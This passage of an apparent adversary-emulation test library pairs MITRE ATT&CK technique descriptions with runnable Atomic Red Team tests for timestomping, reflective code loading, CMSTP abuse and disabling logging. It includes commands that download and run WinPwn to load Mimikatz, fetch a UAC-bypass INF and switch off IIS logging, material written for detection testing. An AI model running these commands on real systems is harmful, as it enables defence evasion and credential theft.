prereq_command: 'if (Test-Path "#{file_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Path "#{file_path}" -Force | Out-Null
Set-Content "#{file_path}" -Value "T1551.006 Timestomp" -Force | Out-Null
executor:
command: 'Get-ChildItem "#{file_path}" | % { $_.CreationTime = "#{target_date_time}"
}
'
name: powershell
- name: Windows - Modify file last modified timestamp with PowerShell
auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2
description: |
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
supported_platforms:
- windows
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change modified timestamp
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
- description: 'A file must exist at the path (#{file_path}) to change the modified
time on
'
prereq_command: 'if (Test-Path "#{file_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Path "#{file_path}" -Force | Out-Null
Set-Content "#{file_path}" -Value "T1551.006 Timestomp" -Force | Out-Null
executor:
command: 'Get-ChildItem "#{file_path}" | % { $_.LastWriteTime = "#{target_date_time}"
}
'
name: powershell
- name: Windows - Modify file last access timestamp with PowerShell
auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62
description: |
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
supported_platforms:
- windows
input_arguments:
target_date_time:
description: Date/time to replace original timestamps with
type: string
default: 01/01/1970 00:00:00
file_path:
description: Path of file to change last access timestamp
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\T1551.006_timestomp.txt
dependency_executor_name: powershell
dependencies:
- description: 'A file must exist at the path ("#{file_path}") to change the
last access time on
'
prereq_command: 'if (Test-Path "#{file_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Path "#{file_path}" -Force | Out-Null
Set-Content "#{file_path}" -Value "T1551.006 Timestomp" -Force | Out-Null
executor:
command: 'Get-ChildItem "#{file_path}" | % { $_.LastAccessTime = "#{target_date_time}"
}
'
name: powershell
- name: Windows - Timestomp a File
auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43
description: "Timestomp kxwn.lock.\n\nSuccessful execution will include the
placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify
the time of the .lock file. \n\n[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)\n"
supported_platforms:
- windows
input_arguments:
file_path:
description: File path for timestomp payload
type: string
default: PathToAtomicsFolder\..\ExternalPayloads
dependency_executor_name: powershell
dependencies:
- description: 'timestomp.ps1 must be present in #{file_path}.
'
prereq_command: 'if (Test-Path "#{file_path}\timestomp.ps1") {exit 0} else
{exit 1}
'
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1"
-OutFile "#{file_path}\timestomp.ps1"
'
- description: 'kxwn.lock must be present in #{file_path}.
'
prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else
{exit 1}
'
get_prereq_command: 'New-Item -Path "#{file_path}\kxwn.lock" -ItemType File
'
executor:
command: |
import-module "#{file_path}\timestomp.ps1"
timestomp -dest "#{file_path}\kxwn.lock"
name: powershell
- name: MacOS - Timestomp Date Modified
auto_generated_guid: 87fffff4-d371-4057-a539-e3b24c37e564
description: 'Stomps on the modification timestamp of a file using MacOS''s
SetFile utility
'
supported_platforms:
- macos
input_arguments:
target_filename:
description: 'Path of file that we are going to stomp on last modified time
'
type: path
default: "/tmp/T1070.006-modified.txt"
target_date:
description: Date to replace original timestamps with
type: string
default: 01/01/1970
dependencies:
- description: 'The file must exist in order to be timestomped
'
prereq_command: 'test -e #{target_filename} && exit 0 || exit 1
'
get_prereq_command: 'echo ''T1070.006 MacOS file modified timestomp test''
> #{target_filename}
'
executor:
name: sh
command: 'SetFile -m #{target_date} #{target_filename}
'
cleanup_command: 'rm -f #{target_filename}
'
- name: Event Log Manipulations- Time slipping via Powershell
auto_generated_guid: 7bcf83bf-f5ef-425c-9d9a-71618ad9ed12
description: "Changes the system time on the computer to a time that you specify.
It involves altering the system’s clock or adjusting the dates of files, affecting
timestamp integrity within Event Logs. This technique can disrupt the sequence
of logged events, complicating incident analysis and forensics. \nReference
- \nhttps://detect.fyi/event-log-manipulations-1-time-slipping-55bf95631c40\nhttps://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/set-date?view=powershell-7.4"
supported_platforms:
- windows
input_arguments:
days_to_modify:
description: Value to which system time will update
type: string
default: '3'
executor:
command: "try{ \n Set-Date -Date (Get-Date).AddDays(#{days_to_modify})\n
\ Add-Content \"$env:APPDATA\\slipDays.bak\" #{days_to_modify}\n}\ncatch
{exit 1}\n"
cleanup_command: |
if(Test-Path "$env:APPDATA\slipDays.bak" ){
foreach($line in (get-content $env:APPDATA\slipDays.bak)){
Set-Date -Date (Get-Date).AddDays(-$line)
}
rm "$env:APPDATA\slipDays.bak"
}
name: powershell
elevation_required: true
T1620:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a
created: '2021-10-05T01:15:06.293Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1620
external_id: T1620
- source_name: 00sec Droppers
description: 0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved
October 4, 2021.
url: https://0x00sec.org/t/super-stealthy-droppers/3715
- source_name: S1 Custom Shellcode Tool
description: Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode
Analysis. Retrieved October 4, 2021.
url: https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/
- source_name: Mandiant BYOL
description: Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel
Red Teaming Technique. Retrieved October 4, 2021.
url: https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique
- source_name: S1 Old Rat New Tricks
description: Landry, J. (2016, April 21). Teaching an old RAT new tricks.
Retrieved October 4, 2021.
url: https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/
- source_name: MDSec Detecting DOTNET
description: MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET
Tradecraft. Retrieved October 4, 2021.
url: https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/
- source_name: Microsoft AssemblyLoad
description: Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9,
2024.
url: https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load
- source_name: Intezer ACBackdoor
description: 'Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a
New Multiplatform Backdoor. Retrieved October 4, 2021.'
url: https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/
- source_name: Stuart ELF Memory
description: Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without
tmpfs). Retrieved October 4, 2021.
url: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
- source_name: Introducing Donut
description: The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as
Shellcode. Retrieved October 4, 2021.
url: https://thewover.github.io/Introducing-Donut/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:44.030Z'
name: Reflective Code Loading
description: |-
Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).
Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)
Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- João Paulo de A. Filho, @Hug1nN__
- Shlomi Salem, SentinelOne
- Lior Ribak, SentinelOne
- Rex Guo, @Xiaofei_REX, Confluera
- Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics
- Jiraput Thamsongkrah
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.3'
identifier: T1620
atomic_tests:
- name: WinPwn - Reflectively load Mimik@tz into memory
auto_generated_guid: 56b9589c-9170-4682-8c3d-33b86ecb5119
description: Reflectively load Mimik@tz into memory technique via function of
WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive
name: powershell
T1480.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
created: '2024-09-19T14:00:03.401Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1480/002
external_id: T1480.002
- source_name: Intezer RedXOR 2021
description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
September 19, 2024.
url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
- source_name: Sans Mutexes 2012
description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
- source_name: ICS Mutexes 2015
description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
to Evade Detection. Retrieved September 19, 2024.
url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
- source_name: Microsoft Mutexes
description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
2024.
url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
- source_name: Deep Instinct BPFDoor 2023
description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
19, 2024.
url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:50:39.088Z'
name: Mutual Exclusion
description: |-
Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
- Nagahama Hiroki – NEC Corporation Japan
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1564.011:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b
created: '2023-08-24T17:23:34.470Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/011
external_id: T1564.011
- source_name: Linux Signal Man
description: Linux man-pages. (2023, April 3). signal(7). Retrieved August
30, 2023.
url: https://man7.org/linux/man-pages/man7/signal.7.html
- source_name: nohup Linux Man
description: Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023.
url: https://linux.die.net/man/1/nohup
- source_name: Microsoft PowerShell SilentlyContinue
description: Microsoft. (2023, March 2). $DebugPreference. Retrieved August
30, 2023.
url: https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:41:11.807Z'
name: Ignore Process Interrupts
description: "Adversaries may evade defensive mechanisms by executing commands
that hide from process interrupt signals. Many operating systems use signals
to deliver messages to control process behavior. Command interpreters often
include specific commands/flags that ignore errors and other hangups, such
as when the user of the active session logs off.(Citation: Linux Signal Man)
\ These interrupt signals may also be used by defensive tools and/or analysts
to pause or terminate specified running processes. \n\nAdversaries may invoke
processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001)
`-ErrorAction SilentlyContinue`, or similar commands that may be immune to
hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue)
This may enable malicious commands and malware to continue execution through
system events that would otherwise terminate its execution, such as users
logging off or the termination of its C2 network connection.\n\nHiding from
process interrupt signals may allow malware to continue execution, but unlike
[Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish
[Persistence](https://attack.mitre.org/tactics/TA0003) since the process will
not be re-invoked once actually terminated."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Viren Chaudhari, Qualys
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1497.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
created: '2020-03-06T21:11:11.225Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1497/003
external_id: T1497.003
- source_name: ISACA Malware Tricks
description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:44.870Z'
name: Time Based Evasion
description: "Adversaries may employ various time-based methods to detect virtualization
and analysis environments, particularly those that attempt to manipulate time
mechanisms to simulate longer elapses of time. This may include enumerating
time-based properties, such as uptime or the system clock. \n\nAdversaries
may use calls like `GetTickCount` and `GetSystemTimeAsFileTime` to discover
if they are operating within a virtual machine or sandbox, or may be able
to identify a sandbox accelerating time by sampling and calculating the expected
value for an environment's timestamp before and after execution of a sleep
function.(Citation: ISACA Malware Tricks)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Jorge Orchilles, SCYTHE
- Ruben Dodge, @shotgunner101
- Jeff Felling, Red Canary
- Deloitte Threat Library Team
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '2.0'
identifier: T1497.003
atomic_tests:
- name: Delay execution with ping
auto_generated_guid: 8b87dd03-8204-478c-bac3-3959f6528de3
description: 'Uses the ping command to introduce a delay before executing a
malicious payload.
'
supported_platforms:
- linux
- macos
input_arguments:
evil_command:
description: Command to run after the delay
type: string
default: whoami
ping_count:
description: Number of ping requests to send (higher counts increase the
delay)
type: integer
default: 250
executor:
command: |
ping -c #{ping_count} 8.8.8.8 > /dev/null
#{evil_command}
name: sh
T1218.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49
created: '2020-01-23T18:27:30.656Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/003
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
Retrieved September 12, 2024.
url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)
- source_name: MSitPros CMSTP Aug 2017
description: Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April
11, 2018.
url: https://msitpros.com/?p=3960
- source_name: GitHub Ultimate AppLocker Bypass List
description: Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved
April 10, 2018.
url: https://github.com/api0cradle/UltimateAppLockerByPassList
- source_name: Endurant CMSTP July 2018
description: Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code
Execution and UAC Bypass With Sysmon.. Retrieved November 17, 2024.
url: https://web.archive.org/web/20190316220149/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
applocker bypass. Retrieved September 12, 2024.
url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:45.149Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Nik Seetharaman, Palantir
- Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.2'
identifier: T1218.003
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
auto_generated_guid: 34e63321-9683-496b-bbc1-7566bc55e624
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
'
supported_platforms:
- windows
input_arguments:
inf_file_path:
description: Path to the INF file
type: path
default: PathToAtomicsFolder\T1218.003\src\T1218.003.inf
dependency_executor_name: powershell
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_file_path})
'
prereq_command: 'if (Test-Path "#{inf_file_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_file_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003.inf" -OutFile "#{inf_file_path}"
executor:
command: 'cmstp.exe /s "#{inf_file_path}"
'
name: command_prompt
- name: CMSTP Executing UAC Bypass
auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
'
supported_platforms:
- windows
input_arguments:
inf_file_uac:
description: Path to the INF file
type: path
default: PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf
dependency_executor_name: powershell
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_file_uac})
'
prereq_command: 'if (Test-Path "#{inf_file_uac}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_file_uac}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}"
executor:
command: 'cmstp.exe /s "#{inf_file_uac}" /au
'
name: command_prompt
T1562.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a
created: '2020-02-21T20:46:36.688Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/002
external_id: T1562.002
- source_name: Disable_Win_Event_Logging
description: " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved
September 10, 2021."
url: https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging
- source_name: def_ev_win_event_logging
description: 'Chandel, R. (2021, April 22). Defense Evasion: Windows Event
Logging (T1562.002). Retrieved September 14, 2021.'
url: https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/
- source_name: EventLog_Core_Technologies
description: 'Core Technologies. (2021, May 24). Essential Windows Services:
EventLog / Windows Event Log. Retrieved September 14, 2021.'
url: https://www.coretechnologies.com/blog/windows-services/eventlog/
- source_name: Audit_Policy_Microsoft
description: Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September
13, 2021.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy
- source_name: Windows Log Events
description: Franklin Smith. (n.d.). Windows Security Log Events. Retrieved
February 21, 2020.
url: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/
- source_name: disable_win_evt_logging
description: 'Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging.
Retrieved April 7, 2022.'
url: https://ptylu.github.io/content/report/report.html?report=25
- source_name: auditpol
description: Jason Gerend, et al. (2017, October 16). auditpol. Retrieved
September 1, 2021.
url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol
- source_name: winser19_file_overwrite_bug_twitter
description: Naceri, A. (2021, November 7). Windows Server 2019 file overwrite
bug. Retrieved April 7, 2022.
url: https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040
- source_name: T1562.002_redcanaryco
description: redcanaryco. (2021, September 3). T1562.002 - Disable Windows
Event Logging. Retrieved September 13, 2021.
url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md
- source_name: Advanced_sec_audit_policy_settings
description: Simpson, D. et al. (2017, April 19). Advanced security audit
policy settings. Retrieved September 14, 2021.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings
- source_name: auditpol.exe_STRONTIC
description: STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.
url: https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html
- source_name: evt_log_tampering
description: 'svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting
the EventLog Service. Retrieved September 14, 2021.'
url: https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:45.425Z'
name: 'Impair Defenses: Disable Windows Event Logging'
description: |-
Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)
Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)
There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System and HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging)
Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)
By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering
Team
- Lucas Heiligenstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.4'
identifier: T1562.002
atomic_tests:
- name: Disable Windows IIS HTTP Logging
auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db
description: |
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union).
This action requires HTTP logging configurations in IIS to be unlocked.
Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
supported_platforms:
- windows
input_arguments:
website_name:
description: The name of the website on a server
type: string
default: Default Web Site
executor:
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
'
cleanup_command: |
